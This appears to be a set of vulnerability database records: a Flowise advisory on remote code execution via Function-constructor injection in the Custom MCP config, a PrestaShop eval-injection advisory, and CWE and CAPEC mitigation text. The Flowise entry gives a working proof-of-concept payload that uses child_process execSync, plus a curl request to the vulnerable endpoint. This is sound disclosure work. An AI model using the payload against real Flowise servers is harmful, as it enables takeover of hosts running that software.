"details": "### Summary\nUser-controlled input flows to an unsafe implementaion of a dynamic Function constructor , allowing a malicious actor to run JS code in the context of the host (not sandboxed) leading to RCE. \n\n### Details\nWhen creating a new `Custom MCP` Chatflow in the platform, the MCP Server Config displays a placeholder hinting at an example of the expected input structure:\n```json\n{\n\t\"command\": \"npx\",\n\t\"args\": [\"-y\", \"@modelcontextprotocol/server-filesystem\", \"/path/to/allowed/files\"]\n}\n```\n\nBehind the scene, a `POST` request to `/api/v1/node-load-method/customMCP` is sent with the provided MCP Server Config, with additional parameters (excluded for brevity):\n```json\n{\n...SNIP...\n\n \"inputs\":{\n \"mcpServerConfig\":{\n \"command\":\"npx\",\n \"args\":[\n \"-y\",\n \"@modelcontextprotocol/server-filesystem\",\n \"/path/to/allowed/files\"\n ]\n }\n },\n \"loadMethod\":\"listActions\"\n \n...SNIP...\n}\n```\n\nSending the same request with the parameter `mcpServerConfig` equals to a plain value and not an object, for example:\n```json\n{\n \"inputs\":{\n \"mcpServerConfig\":\"test\"\n },\n \"loadMethod\":\"listActions\"\n}\n```\n\nWe enter an interesting code flow that leads to a function named `convertValidJSONString` (Line 103):\nhttps://github.com/FlowiseAI/Flowise/blob/416e57380ea7ce2e66f89aded61b249ff3eef3b2/packages/components/nodes/tools/MCP/CustomMCP/CustomMCP.ts#L103\n\n```typescript\nasync getTools(nodeData: INodeData): Promise\u003cTool[]\u003e {\n const mcpServerConfig = nodeData.inputs?.mcpServerConfig as string\n\n if (!mcpServerConfig) {\n throw new Error(\u0027MCP Server Config is required\u0027)\n }\n\n try {\n let serverParams\n if (typeof mcpServerConfig === \u0027object\u0027) {\n serverParams = mcpServerConfig\n } else if (typeof mcpServerConfig === \u0027string\u0027) {\n const serverParamsString = convertToValidJSONString(mcpServerConfig) \u003c--\n serverParams = JSON.parse(serverParamsString)\n }\n\n const toolkit = new MCPToolkit(serverParams, \u0027stdio\u0027)\n await toolkit.initialize()\n\n const tools = toolkit.tools ?? []\n\n return tools as Tool[]\n } catch (error) {\n throw new Error(`Invalid MCP Server Config: ${error}`)\n }\n }\n}\n```\n\nHere, the value of `inputString` originating from `mcpServerConfig` is being concatenated to a dynamic Function constructor that evaluates the provided value similar to using `eval`:\n\n```typescript\nfunction convertToValidJSONString(inputString: string) {\n try {\n const jsObject = Function(\u0027return \u0027 + inputString)()\n return JSON.stringify(jsObject, null, 2)\n } catch (error) {\n console.error(\u0027Error converting to JSON:\u0027, error)\n return \u0027\u0027\n }\n}\n```\n\nThis JS code runs in the context of the host, not sandboxed using `@flowiseai/nodevm` like other code execution functionalities within the platform.\n\nThis enables access to the global `process` object and as a result access to all the native NodeJS modules available such as `child_process`, leading to Remote Code Execution.\n```json\n{\n \"inputs\":{\n \"mcpServerConfig\":\"(global.process.mainModule.require(\u0027child_process\u0027).execSync(\u0027touch /tmp/yofitofi\u0027))\"\n },\n \"loadMethod\":\"listActions\"\n}\n```\n### PoC\n1. Follow the provided instructions for running the app using Docker Compose (or other methods of your choosing such as `npx`, `pnpm`, etc):\n https://github.com/FlowiseAI/Flowise?tab=readme-ov-file#-docker\n\n2. Create a new file named `payload.json` somewhere in your machine, with the following data:\n```\n{\"inputs\":{\"mcpServerConfig\":\"(global.process.mainModule.require(\u0027child_process\u0027).execSync(\u0027touch /tmp/yofitofi\u0027))\"},\n\"loadMethod\":\"listActions\"}\n```\n\n3. Send the following `curl` request using the `payload.json` file created above with the following command:\n```\ncurl -XPOST -H \"x-request-from: internal\" -H \"Content-Type: application/json\" --data @payload.json \"http://localhost:3000/api/v1/node-load-method/customMCP\"\n```\n\n4. Observe that a new file named `yofitofi` is created under `/tmp` folder.\n### Impact\nRemote code execution\n\n## Credit\nThe vulnerability was discovered by Assaf Levkovich of the JFrog Security Research team.",
"id": "GHSA-hmgh-466j-fx4c",
"modified": "2025-10-06T14:08:45Z",
"published": "2025-10-06T14:08:45Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-hmgh-466j-fx4c"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55346"
},
{
"type": "PACKAGE",
"url": "https://github.com/FlowiseAI/Flowise"
},
{
"type": "WEB",
"url": "https://research.jfrog.com/vulnerabilities/flowise-js-injection-remote-code-exection-jfsa-2025-001379925"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Flowise vulnerable to RCE via Dynamic function constructor injection"
}
GHSA-HRGX-P36P-89Q4
Vulnerability from github – Published: 2022-07-29 22:27 – Updated: 2022-07-29 22:27Impact
Eval injection possible if the shop is vulnerable to an SQL injection.
Patches
The problem is fixed in version 1.7.8.7
Workarounds
Delete the MySQL Smarty cache feature by removing these lines in the file config/smarty.config.inc.php lines 43-46 (PrestaShop 1.7) or 40-43 (PrestaShop 1.6):
if (Configuration::get('PS_SMARTY_CACHING_TYPE') == 'mysql') {
include _PS_CLASS_DIR_.'Smarty/SmartyCacheResourceMysql.php';
$smarty->caching_type = 'mysql';
}
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "prestashop/prestashop"
},
"ranges": [
{
"events": [
{
"introduced": "1.6.0.10"
},
{
"fixed": "1.7.8.7"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2022-31181"
],
"database_specific": {
"cwe_ids": [
"CWE-89",
"CWE-95"
],
"github_reviewed": true,
"github_reviewed_at": "2022-07-29T22:27:27Z",
"nvd_published_at": "2022-08-01T20:15:00Z",
"severity": "CRITICAL"
},
"details": "### Impact\nEval injection possible if the shop is vulnerable to an SQL injection.\n\n### Patches\nThe problem is fixed in version 1.7.8.7\n\n### Workarounds\nDelete the MySQL Smarty cache feature by removing these lines in the file `config/smarty.config.inc.php` lines 43-46 (PrestaShop 1.7) or 40-43 (PrestaShop 1.6):\n```php\nif (Configuration::get(\u0027PS_SMARTY_CACHING_TYPE\u0027) == \u0027mysql\u0027) {\n include _PS_CLASS_DIR_.\u0027Smarty/SmartyCacheResourceMysql.php\u0027;\n $smarty-\u003ecaching_type = \u0027mysql\u0027;\n}\n```\n",
"id": "GHSA-hrgx-p36p-89q4",
"modified": "2022-07-29T22:27:27Z",
"published": "2022-07-29T22:27:27Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/PrestaShop/PrestaShop/security/advisories/GHSA-hrgx-p36p-89q4"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-31181"
},
{
"type": "WEB",
"url": "https://github.com/PrestaShop/PrestaShop/commit/b6d96e7c2a4e35a44e96ffbcdfd34439b56af804"
},
{
"type": "PACKAGE",
"url": "https://github.com/PrestaShop/PrestaShop"
},
{
"type": "WEB",
"url": "https://github.com/PrestaShop/PrestaShop/releases/tag/1.7.8.7"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "PrestaShop eval injection possible if shop vulnerable to SQL injection"
}
Mitigation
Strategy: Refactoring
If possible, refactor your code so that it does not need to use eval() at all.
Mitigation MIT-5
Strategy: Input Validation
- Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.
- When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."
- Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
Mitigation
- Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180, CWE-181). Make sure that your application does not inadvertently decode the same input twice (CWE-174). Such errors could be used to bypass allowlist schemes by introducing dangerous inputs after they have been checked. Use libraries such as the OWASP ESAPI Canonicalization control.
- Consider performing repeated canonicalization until your input does not change any more. This will avoid double-decoding and similar scenarios, but it might inadvertently modify inputs that are allowed to contain properly-encoded dangerous content.
Mitigation
For Python programs, it is frequently encouraged to use the ast.literal_eval() function instead of eval, since it is intentionally designed to avoid executing code. However, an adversary could still cause excessive memory or stack consumption via deeply nested structures [REF-1372], so the python documentation discourages use of ast.literal_eval() on untrusted data [REF-1373].
CAPEC-35: Leverage Executable Code in Non-Executable Files
An attack of this type exploits a system's trust in configuration and resource files. When the executable loads the resource (such as an image file or configuration file) the attacker has modified the file to either execute malicious code directly or manipulate the target process (e.g. application server) to execute based on the malicious configuration parameters. Since systems are increasingly interrelated mashing up resources from local and remote sources the possibility of this attack occurring is high.